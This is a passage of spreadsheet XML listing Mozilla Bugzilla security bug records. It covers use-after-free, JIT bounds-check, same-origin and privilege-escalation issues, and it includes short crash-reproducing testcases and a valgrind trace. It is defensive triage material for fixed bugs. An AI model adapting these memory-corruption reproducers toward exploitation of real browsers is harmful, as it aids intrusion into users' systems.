        </is>
      </c>
      <c r="N2687" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2687" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2687" t="inlineStr">
        <is>
          <t>[adv-main122+]</t>
        </is>
      </c>
      <c r="Q2687" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2687" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2687" t="inlineStr">
        <is>
          <t>122 Branch</t>
        </is>
      </c>
      <c r="T2687" t="n">
        <v>1</v>
      </c>
      <c r="U2687" t="n">
        <v>0</v>
      </c>
      <c r="V2687" t="n">
        <v>16</v>
      </c>
      <c r="W2687" t="inlineStr">
        <is>
          <t>In bug 1342887, a timeout was added to the synchronous wait in `UpdateDriverSetupMacCommandLine` for a dispatch to the main thread. Unfortunately, this timeout will likely lead to a UAF if triggered, as the closure for the runnable holds references to stack local values: https://searchfox.org/mozilla-central/rev/f030995a79461379153293c0e07f4982afe9ac28/toolkit/xre/nsUpdateDriver.cpp#91.
This code should either be changed to remove the timeout (likely changing to to instead use a helper like [`SyncRunnable`](https://searchfox.org/mozilla-central/rev/f030995a79461379153293c0e07f4982afe9ac28/xpcom/threads/SyncRunnable.h#32) which makes this sort of thing safer, or it should be modified to work safely, by copying all relevant state onto the heap. Given the types of some of the captured data (including mutating raw pointer in/out parameters), however, this seems like it would be a bit tricky.
That being said, looking at the callers of `UpdateDriverSetupMacCommandLine`, I actually think it is possible to avoid the call and dispatch all-together.
This function appears to be called indirectly through [`ProcessUpdates`](https://searchfox.org/mozilla-central/rev/f030995a79461379153293c0e07f4982afe9ac28/toolkit/xre/nsUpdateDriver.cpp#694,729,736), which only appears to be called off-main-thread in [`nsUpdateProcessor::StartStagedUpdate`](https://searchfox.org/mozilla-central/rev/f030995a79461379153293c0e07f4982afe9ac28/toolkit/xre/nsUpdateDriver.cpp#832). In this case the `restart` parameter is `false`, and we should be post-XPCOM-startup meaning that [most of the `SetupMacCommandLine` function](https://searchfox.org/mozilla-central/rev/f030995a79461379153293c0e07f4982afe9ac28/toolkit/xre/nsCommandLineServiceMac.mm#60-75) is a no-op. In addition, the [only non-noop section](https://searchfox.org/mozilla-central/rev/f030995a79461379153293c0e07f4982afe9ac28/toolkit/xre/nsCommandLineServiceMac.mm#51-58) only removes command line flags, and if `restart` is false, those flags [will never be in the passed in argc array](https://searchfox.org/mozilla-central/rev/f030995a79461379153293c0e07f4982afe9ac28/toolkit/xre/nsUpdateDriver.cpp#554-575,619).
I believe the `UpdateDriverSetupMacCommandLine` function can be removed, and the relevant code inserted into the call-site: https://searchfox.org/mozilla-central/rev/f030995a79461379153293c0e07f4982afe9ac28/toolkit/xre/nsUpdateDriver.cpp#619
```c++
if (restart) {
  MOZ_RELEASE_ASSERT(NS_IsMainThread(),
                     "restart may only be set for calls on the main thread");
  CommandLineServiceMac::SetupMacCommandLine(argc, argv, restart);
}
```</t>
        </is>
      </c>
      <c r="X2687" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2688">
      <c r="A2688" t="n">
        <v>1145255</v>
      </c>
      <c r="B2688" t="inlineStr">
        <is>
          <t>2015-03-19 11:11:42 -0700</t>
        </is>
      </c>
      <c r="C2688" t="inlineStr">
        <is>
          <t>Incorrect asm.js bounds checking elimination (Pwn2Own 2015) (ZDI-CAN-2830)</t>
        </is>
      </c>
      <c r="D2688" t="inlineStr">
        <is>
          <t>2018-02-22 21:36:53 -0800</t>
        </is>
      </c>
      <c r="E2688" t="n">
        <v>1</v>
      </c>
      <c r="F2688" t="n">
        <v>1</v>
      </c>
      <c r="G2688" t="n">
        <v>3</v>
      </c>
      <c r="H2688" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2688" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2688" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2688" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2688" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2688" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2688" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2688" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2688" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main37-][adv-esr31.6-][jsbugmon:update,testComment=13,origRev=2e2222a40262] 32-bit</t>
        </is>
      </c>
      <c r="Q2688" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2688" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2688" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T2688" t="n">
        <v>1</v>
      </c>
      <c r="U2688" t="n">
        <v>0</v>
      </c>
      <c r="V2688" t="n">
        <v>40</v>
      </c>
      <c r="W2688" t="inlineStr">
        <is>
          <t>Created attachment 8580174
ZDI-CAN-2830.tar
ilxu1a pwned Firefox on windows and got calc.exe to run. the final privilege escalation came from re-enabling enablePrivilege (Hi Bobby -- can we kill that soon?) but the primary bug is in the JIT. The bug also occurs on 32-bit Linux
crash is at
0x8020052
xul!js::proxy_GetGeneric+0xd63
xul!JSTracer::setTracingDetails+0x2514
xul!JS::ObjectPtr::ObjectPtr+0x19b62
xul!js::ExucuteInGlobalAndReturnScope+0x48c7</t>
        </is>
      </c>
      <c r="X2688" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2689">
      <c r="A2689" t="n">
        <v>419014</v>
      </c>
      <c r="B2689" t="inlineStr">
        <is>
          <t>2008-02-22 04:28:15 -0800</t>
        </is>
      </c>
      <c r="C2689" t="inlineStr">
        <is>
          <t>[SECURITY] Old charts are not project specific, and product names are viewable in graphs/</t>
        </is>
      </c>
      <c r="D2689" t="inlineStr">
        <is>
          <t>2010-11-27 12:08:42 -0800</t>
        </is>
      </c>
      <c r="E2689" t="n">
        <v>1</v>
      </c>
      <c r="F2689" t="n">
        <v>1</v>
      </c>
      <c r="G2689" t="n">
        <v>4</v>
      </c>
      <c r="H2689" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2689" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2689" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K2689" t="inlineStr">
        <is>
          <t>2.12</t>
        </is>
      </c>
      <c r="L2689" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2689" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2689" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2689" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2689" t="inlineStr"/>
      <c r="Q2689" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2689" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2689" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T2689" t="n">
        <v>1</v>
      </c>
      <c r="U2689" t="n">
        <v>0</v>
      </c>
      <c r="V2689" t="n">
        <v>36</v>
      </c>
      <c r="W2689" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
Build Identifier: Bugzilla 3.0.3
If you run two or more projects of Bugzilla on one codebase, the chart created by reports.cgi are saved into ./graphs, not in ./graphs/&lt;project&gt;/.
So if you let create the chart of "project_1" (-All-_NEW_ASSIGNED_REOPENED_UNCONFIRMED) und then do the same procedure in "project_2", you will see _exactly_ the same chart! That is because the reports.cgi only creates new versions of chart, if there's no old file with the composed filename.
Reproducible: Always
Steps to Reproduce:
1. Execute reports.cgi with product "-All-" in one project
2. Execute reports.cgi with product "-All-" in another project.
3. Compare chart urls (spoiler: it will be the same)
Actual Results:  
Both charts are the same, even if there are _no similarities_ between the two projects.
Bugzilla creates for multiple projects just one chart (for each product).
Expected Results:  
Bugzilla should create the charts per project, so that the order hierarchie look like this:
*graphs
 *project_1
  *-All-_NEW_ASSIGNED_REOPENED_UNCONFIRMED.png
 *project_2
  *-All-_NEW_ASSIGNED_REOPENED_UNCONFIRMED.png
  *... some other charts ...</t>
        </is>
      </c>
      <c r="X2689" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2690">
      <c r="A2690" t="n">
        <v>234680</v>
      </c>
      <c r="B2690" t="inlineStr">
        <is>
          <t>2004-02-17 10:22:09 -0800</t>
        </is>
      </c>
      <c r="C2690" t="inlineStr">
        <is>
          <t>Uninstall should give the option to remove profile data</t>
        </is>
      </c>
      <c r="D2690" t="inlineStr">
        <is>
          <t>2008-05-01 02:12:37 -0700</t>
        </is>
      </c>
      <c r="E2690" t="n">
        <v>1</v>
      </c>
      <c r="F2690" t="n">
        <v>1</v>
      </c>
      <c r="G2690" t="n">
        <v>2</v>
      </c>
      <c r="H2690" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2690" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2690" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K2690" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2690" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2690" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2690" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2690" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P2690" t="inlineStr"/>
      <c r="Q2690" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2690" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2690" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2690" t="n">
        <v>1</v>
      </c>
      <c r="U2690" t="n">
        <v>33</v>
      </c>
      <c r="V2690" t="n">
        <v>47</v>
      </c>
      <c r="W2690" t="inlineStr">
        <is>
          <t>User-Agent:       
Build Identifier: Firefox 0.8
When uninstalling Firefox, preferences and previously-downloaded skins and components are still 
saved, even after selecting yes to "Are you sure you want to completely remove Mozilla Firefox (.8) 
and all of its components?" and "Not all files were uninstalled from the installation directory: 
C:\Program Files\Mozilla Firefox\ Do you want to completely delete this directory?"
Reproducible: Always
Steps to Reproduce:
1. Install Firefox 0.8, add new skins and change various user preferences.
2. Uninstall Firefox, selecting "yes" when asked if one wants to completely remove everything.
3. After uninstalling, completely remove /Documents and Settings/User/Application Data/Mozilla 
and /Program Files/[Firefox Directory]
4. Restart
5. Reinstall Firefox in either the same directory as before OR a new one
6. Run Firefox
Actual Results:  
Found old skins and preferences still present.
Expected Results:  
Removed all saved preferences and skins, giving me a fresh installation.</t>
        </is>
      </c>
      <c r="X2690" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2691">
      <c r="A2691" t="n">
        <v>571287</v>
      </c>
      <c r="B2691" t="inlineStr">
        <is>
          <t>2010-06-10 11:13:54 -0700</t>
        </is>
      </c>
      <c r="C2691" t="inlineStr">
        <is>
          <t>same-origin checks incorrect on canvas</t>
        </is>
      </c>
      <c r="D2691" t="inlineStr">
        <is>
          <t>2011-02-01 03:19:26 -0800</t>
        </is>
      </c>
      <c r="E2691" t="n">
        <v>1</v>
      </c>
      <c r="F2691" t="n">
        <v>1</v>
      </c>
      <c r="G2691" t="n">
        <v>3</v>
      </c>
      <c r="H2691" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2691" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2691" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K2691" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2691" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2691" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2691" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2691" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2691" t="inlineStr">
        <is>
          <t>[sg:high][critsmash-high:patch]</t>
        </is>
      </c>
      <c r="Q2691" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2691" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2691" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2691" t="n">
        <v>1</v>
      </c>
      <c r="U2691" t="n">
        <v>0</v>
      </c>
      <c r="V2691" t="n">
        <v>16</v>
      </c>
      <c r="W2691" t="inlineStr">
        <is>
          <t>Created attachment 450392
testcase
We currently have a notion of a "write-only" canvas, to not allow reading data after an image or other non-same-origin content has been rendered into it.  However, that flag lives on the canvas, and not the context; the context can outlive the canvas.
We do the check here:
  http://hg.mozilla.org/mozilla-central/file/7b15545cf9aa/content/canvas/src/nsCanvasRenderingContext2D.cpp#l3506
but only if we have a mCanvasElement -- which can become null if that element is GC'd.  In that case as part of the destruction process, we call SetCanvasElement with nsnull, and the context doesn't keep a strong reference to the canvas.
The right fix seems to be to keep the element alive for the lifetime of the context: you can then reattach it to the dom via ctx.canvas, whereas once you orphan a context you can't ever attach it to a canvas.  The other potential fix is to move the origin-clean flag to the context itself.
The first is probably the right solution, patch coming up.</t>
        </is>
      </c>
      <c r="X2691" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2692">
      <c r="A2692" t="n">
        <v>295854</v>
      </c>
      <c r="B2692" t="inlineStr">
        <is>
          <t>2005-05-28 23:52:21 -0700</t>
        </is>
      </c>
      <c r="C2692" t="inlineStr">
        <is>
          <t>(new InstallVersion()).compareTo(/x/) crashes [@ConvertJSValToObj]</t>
        </is>
      </c>
      <c r="D2692" t="inlineStr">
        <is>
          <t>2015-12-11 07:21:56 -0800</t>
        </is>
      </c>
      <c r="E2692" t="n">
        <v>1</v>
      </c>
      <c r="F2692" t="n">
        <v>1</v>
      </c>
      <c r="G2692" t="n">
        <v>6</v>
      </c>
      <c r="H2692" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2692" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2692" t="inlineStr">
        <is>
          <t>Installer: XPInstall Engine</t>
        </is>
      </c>
      <c r="K2692" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2692" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2692" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2692" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2692" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2692" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q2692" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2692" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2692" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2692" t="n">
        <v>1</v>
      </c>
      <c r="U2692" t="n">
        <v>0</v>
      </c>
      <c r="V2692" t="n">
        <v>40</v>
      </c>
      <c r="W2692" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Build Identifier: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8b2) Gecko/20050528 Firefox/1.0+ (2005052806)
Reproducible: Always
Steps to Reproduce:
1. navigate the browser to
javascript: (new InstallVersion()).compareTo(/x/);
Actual Results:  
the browser crashes.
Expected Results:  
do not crash and fail softly.
FIREFOX caused an invalid page fault in
module XPINSTAL.DLL at 015f:60056d04.</t>
        </is>
      </c>
      <c r="X2692" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2693">
      <c r="A2693" t="n">
        <v>849597</v>
      </c>
      <c r="B2693" t="inlineStr">
        <is>
          <t>2013-03-09 21:55:14 -0800</t>
        </is>
      </c>
      <c r="C2693" t="inlineStr">
        <is>
          <t>Crash when inline script in an XML doc framed by &lt;object&gt; removes the &lt;object&gt;</t>
        </is>
      </c>
      <c r="D2693" t="inlineStr">
        <is>
          <t>2013-11-25 16:41:08 -0800</t>
        </is>
      </c>
      <c r="E2693" t="n">
        <v>1</v>
      </c>
      <c r="F2693" t="n">
        <v>1</v>
      </c>
      <c r="G2693" t="n">
        <v>3</v>
      </c>
      <c r="H2693" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2693" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2693" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K2693" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2693" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2693" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2693" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2693" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2693" t="inlineStr">
        <is>
          <t>[adv-main21+][adv-esr1706+]</t>
        </is>
      </c>
      <c r="Q2693" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2693" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2693" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T2693" t="n">
        <v>1</v>
      </c>
      <c r="U2693" t="n">
        <v>0</v>
      </c>
      <c r="V2693" t="n">
        <v>28</v>
      </c>
      <c r="W2693" t="inlineStr">
        <is>
          <t>Created attachment 723152
testcase (crashes Firefox when loaded)
Nightly: [@ MOZ_XML_GetCurrentColumnNumber ] 
  bp-66cc9dcd-b536-4a1e-bf23-a39492130310
Debug+Opt: [@ nsXMLContentSink::CloseElement] touching null
ASan+Debug: [@ nsXMLContentSink::CloseElement] reading freed memory</t>
        </is>
      </c>
      <c r="X2693" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2694">
      <c r="A2694" t="n">
        <v>737384</v>
      </c>
      <c r="B2694" t="inlineStr">
        <is>
          <t>2012-03-20 05:28:56 -0700</t>
        </is>
      </c>
      <c r="C2694" t="inlineStr">
        <is>
          <t>Assertion failure: thing, at js/src/jsgcmark.cpp:7 or Crash [@ js::gc::MarkInternal]</t>
        </is>
      </c>
      <c r="D2694" t="inlineStr">
        <is>
          <t>2013-01-14 08:25:25 -0800</t>
        </is>
      </c>
      <c r="E2694" t="n">
        <v>1</v>
      </c>
      <c r="F2694" t="n">
        <v>1</v>
      </c>
      <c r="G2694" t="n">
        <v>3</v>
      </c>
      <c r="H2694" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2694" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2694" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2694" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2694" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2694" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2694" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2694" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2694" t="inlineStr">
        <is>
          <t>[sg:critical][qa-] js-triage-done</t>
        </is>
      </c>
      <c r="Q2694" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2694" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2694" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T2694" t="n">
        <v>1</v>
      </c>
      <c r="U2694" t="n">
        <v>0</v>
      </c>
      <c r="V2694" t="n">
        <v>23</v>
      </c>
      <c r="W2694" t="inlineStr">
        <is>
          <t>The following test asserts/crashes on mozilla-central revision 58a2cd0203ee (options -m -n):
a = evalcx('');
for (var i = 0; i &lt; 1000; i++) {
  a[i] = i;
}
function foo(x) {
  for (var i in x) 
        var summary = "Basic support for iterable objects and for-in";
}
schedulegc(1234);
foo(a);
Crash trace:
==8882== Invalid read of size 8
==8882==    at 0x45B745: void js::gc::MarkInternal&lt;JSString&gt;(JSTracer*, JSString**) (jsgc.h:674)
==8882==    by 0x45C5FE: js::gc::MarkIdInternal(JSTracer*, long*) (jsgcmark.cpp:275)
==8882==    by 0x45C65E: js::gc::MarkIdRootRange(JSTracer*, unsigned long, long*, char const*) (jsgcmark.cpp:314)
==8882==    by 0x452E3E: JS::AutoGCRooter::trace(JSTracer*) (jsgc.cpp:2280)
==8882==    by 0x4530DA: JS::AutoGCRooter::traceAll(JSTracer*) (jsgc.cpp:2320)
==8882==    by 0x455623: _ZN2jsL11MarkRuntimeEP8JSTracerb.clone.239 (jsgc.cpp:2336)
==8882==    by 0x455F3B: BeginMarkPhase(JSRuntime*) (jsgc.cpp:2989)
==8882==    by 0x4594D5: GCCycle(JSContext*, JSCompartment*, long, js::JSGCInvocationKind) (jsgc.cpp:3295)
==8882==    by 0x45A51E: Collect(JSContext*, JSCompartment*, long, js::JSGCInvocationKind, js::gcreason::Reason) (jsgc.cpp:3739)
==8882==    by 0x45A835: js::gc::RunDebugGC(JSContext*) (jsgc.cpp:3760)
==8882==    by 0x4D1FE4: _ZN2js2gc10NewGCThingI8JSStringEEPT_P9JSContextNS0_9AllocKindEm.clone.228 (jsgcinlines.h:415)
==8882==    by 0x4D462C: js_NewStringCopyN(JSContext*, unsigned short const*, unsigned long) (jsgcinlines.h:474)
==8882==  Address 0xfc0b8 is not stack'd, malloc'd or (recently) free'd
I confirmed this is not bug 733979, or at least this issue is not fixed by the patch in that bug :) Assuming s-s and sg:critical due to GC-related crash at non-zero address.</t>
        </is>
      </c>
      <c r="X2694" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2695">
      <c r="A2695" t="n">
        <v>1265577</v>
      </c>
      <c r="B2695" t="inlineStr">
        <is>
          <t>2016-04-18 16:22:41 -0700</t>
        </is>
      </c>
      <c r="C2695" t="inlineStr">
        <is>
          <t>don't rely on the views we stash when we destroy a subdocument frame to stick around</t>
        </is>
      </c>
      <c r="D2695" t="inlineStr">
        <is>
          <t>2018-08-29 15:24:07 -0700</t>
        </is>
      </c>
      <c r="E2695" t="n">
        <v>1</v>
      </c>
      <c r="F2695" t="n">
        <v>1</v>
      </c>
      <c r="G2695" t="n">
        <v>3</v>
      </c>
      <c r="H2695" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2695" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2695" t="inlineStr">
        <is>
          <t>Web Painting</t>
        </is>
      </c>
      <c r="K2695" t="inlineStr">
        <is>
          <t>17 Branch</t>
        </is>
      </c>
      <c r="L2695" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2695" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2695" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2695" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2695" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main47+][adv-esr45.2+]</t>
        </is>
      </c>
      <c r="Q2695" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2695" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2695" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T2695" t="n">
        <v>1</v>
      </c>
      <c r="U2695" t="n">
        <v>0</v>
      </c>
      <c r="V2695" t="n">
        <v>38</v>
      </c>
      <c r="W2695" t="inlineStr">
        <is>
          <t>Nothing forces them to stick around. The only thing that makes it true most of the time is we clear the stashed views on a script runner, limiting the total changes that can happen while we have them stored. But nothing prevents those changes from including destroying the stored views.</t>
        </is>
      </c>
      <c r="X2695" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2696">
      <c r="A2696" t="n">
        <v>597162</v>
      </c>
      <c r="B2696" t="inlineStr">
        <is>
          <t>2010-09-16 13:11:02 -0700</t>
        </is>
      </c>
      <c r="C2696" t="inlineStr">
        <is>
          <t>potential arbitrary code execution when type=content chrome frames web content</t>
        </is>
      </c>
      <c r="D2696" t="inlineStr">
        <is>
          <t>2013-12-27 14:34:14 -0800</t>
        </is>
      </c>
      <c r="E2696" t="n">
        <v>1</v>
      </c>
      <c r="F2696" t="n">
        <v>1</v>
      </c>
      <c r="G2696" t="n">
        <v>3</v>
      </c>
      <c r="H2696" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2696" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2696" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2696" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2696" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2696" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2696" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2696" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2696" t="inlineStr">
        <is>
          <t xml:space="preserve">[sg:critical] [fixed in TM in bug 641342] plausible social engineering escalation in testcase4 </t>
        </is>
      </c>
      <c r="Q2696" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2696" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2696" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2696" t="n">
        <v>1</v>
      </c>
      <c r="U2696" t="n">
        <v>0</v>
      </c>
      <c r="V2696" t="n">
        <v>34</v>
      </c>
      <c r="W2696" t="inlineStr">
        <is>
          <t>Firefox 4 introduces about:addons -- the former add-ons dialog reborn as chrome-privileged content tab. If you select the "Get Addons" section you get a non-chrome frame hosting addons.mozilla.org. As bzbarsky notes in bug 593387 comment 29 this means web content can get a reference to a privileged chrome window through window.top
Can you do anything fun with this?
For testing purposes you can point extensions.webservice.discoverURL wherever you like (must be an https URL, although it can then navigate to non-SSL which is probably a bug).
If there are any new wrapper problems you can attack this way that would be good to know. 1) we may use this chrome-tab approach elsewhere, and 2) should AMO get hacked/defaced we don't want it to be able to escape into Firefox chrome.</t>
        </is>
      </c>
      <c r="X2696" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2697">
      <c r="A2697" t="n">
        <v>1222015</v>
      </c>
      <c r="B2697" t="inlineStr">
        <is>
          <t>2015-11-05 06:55:42 -0800</t>
        </is>
      </c>
      <c r="C2697" t="inlineStr">
        <is>
          <t>crash in nsAutoCompleteController::ProcessResult</t>
        </is>
      </c>
      <c r="D2697" t="inlineStr">
        <is>
          <t>2016-07-02 11:32:57 -0700</t>
        </is>
      </c>
      <c r="E2697" t="n">
        <v>1</v>
      </c>
      <c r="F2697" t="n">
        <v>1</v>
      </c>
      <c r="G2697" t="n">
        <v>3</v>
      </c>
      <c r="H2697" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2697" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2697" t="inlineStr">
        <is>
          <t>Autocomplete</t>
        </is>
      </c>
      <c r="K2697" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2697" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2697" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2697" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2697" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2697" t="inlineStr">
        <is>
          <t>[adv-main44+]</t>
        </is>
      </c>
      <c r="Q2697" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2697" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2697" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T2697" t="n">
        <v>1</v>
      </c>
      <c r="U2697" t="n">
        <v>0</v>
      </c>
      <c r="V2697" t="n">
        <v>23</v>
      </c>
      <c r="W2697" t="inlineStr">
        <is>
          <t>With the latest SDK based last pass add-on (https://rodan.lastpass.com/dev/lp_e10s.xpi) I get this crash all the time:
